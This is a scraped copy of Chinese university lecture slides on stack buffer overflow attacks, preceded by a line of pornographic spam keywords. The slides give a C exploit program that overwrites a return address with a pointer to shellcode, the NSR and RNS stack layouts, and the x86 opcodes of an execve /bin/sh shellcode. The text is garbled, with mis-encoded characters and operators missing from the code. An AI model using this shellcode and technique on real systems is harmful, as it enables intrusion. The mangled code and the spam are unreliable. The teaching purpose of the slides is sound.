freepeople性欧美熟妇, 色戒完整版无删减158分钟hd, 无码精品国产vα在线观看DVD, 丰满少妇伦精品无码专区在线观看,艾栗栗与纹身男宾馆3p50分钟,国产AV片在线观看,黑人与美女高潮,18岁女RAPPERDISSSUBS,国产手机在机看影片

正文內容

緩沖區(qū)溢出攻擊技術-棧溢出攻擊技術(編輯修改稿)

2024-11-22 11:31 本頁面
 

【文章內容簡介】 改后的返回地址,并執(zhí)行 Shellcode ? 挑戰(zhàn) 1: 將修改后的返回地址填到正確的位置 ? 挑戰(zhàn) 2: 返回地址能正確地指向 Shellcode 北京大學計算機科學技術研究所 22 char shellcode[] = \xeb\x1f\x…… 。 char large_string[128]。 int main(int argc, char **argv){ char buffer[96]。 int i。 long *long_ptr = (long *) large_string。 for (i = 0。 i 32。 i++) *(long_ptr + i) = (int) buffer。 for (i = 0。 i (int) strlen(shellcode)。 i++) large_string[i] = shellcode[i]。 strcpy(buffer, large_string)。 return 0。 } Return add Buffer (96bytes) i long_ptr 高地址 低地址 Para2 Para1 Return add Return add Return add … … shellcode 棧溢出攻擊示例 北京大學計算機科學技術研究所 23 Linux系統(tǒng)下的棧溢出攻擊 ? 棧溢出攻擊 ? NSR模式 ? NRS模式 ? ? Shellcode ? 真實世界中的棧溢出攻擊 北京大學計算機科學技術研究所 24 NOP shellcode Low Address NOP … NOP … RET RET … RET High Address : : NSR溢出模式 北京大學計算機科學技術研究所 25 RET shellcode Low Address RET … RET … NOP NOP … NOP High Address vulnerable2. c: : RNS溢出模式 北京大學計算機科學技術研究所 26 shellcode Low Address FILE NULL … High Address : : 0xc0000000 RET RET … RET -利用環(huán)境變量 北京大學計算機科學技術研究所 27 棧溢出模式分析 ? 挑戰(zhàn) ? 溢出點 (在哪改寫返回地址? ) ? Shellcode地址 (將返回地址改寫成什么? ) ? NSR模式 ? 最經(jīng)典的方法 – Alpha One ? 需要漏洞程序有足夠大的緩沖區(qū) ? RNS模式 ? 能夠適合小緩沖區(qū)情況,更容易計算返回地址 ? ? 最新的方法 : execve (filename, argv [], envp[])。 ? Ret = 0xc0000000 – 4 – strlen (FILENAME) – strlen (shellcode), 不需要任何 NOP ? 但對遠程緩沖區(qū)溢出攻擊不適用 北京大學計算機科學技術研究所 28 Shellcode C版本 北京大學計算機科學技術研究所 29 Shellcode 匯編版本 去除 ’ \0’ 北京大學計算機科學技術研究所 30 Shellcode Opcode版本 ? 31 d2 xor %edx,%edx ? 52 push %edx ? 68 6e 2f 73 68 push $0x68732f6e ? 68 2f 2f 62 69 push $0x69622f2f ? 89 e3 mov %esp,%ebx ? 52 push %edx ? 53 push %ebx ? 89 e1 mov %esp,%ecx ? 8d 42 0b lea 0xb(%edx),%eax ? cd 80 int $0x80 北京大學計算機科學技術研究所 31 給出遠程登錄的 Shellcode 北京大學計算機科學技術研究所 32 滲透防火墻的 Shellcode ? ftl設置 socket狀態(tài) ? scz@nsfocus ? 發(fā)送 OOB數(shù)據(jù) ? bkbll@honke ? 利用 ioctl函數(shù)的 FIONREAD選項 ? eyas@xfocus ? 文件上傳下載功能 北京大學計算機科學技術研究所 33 在真實 Linux世界中的棧溢出攻擊 ? 2020/09
點擊復制文檔內容
教學課件相關推薦
文庫吧 www.dybbs8.com
備案圖片鄂ICP備17016276號-1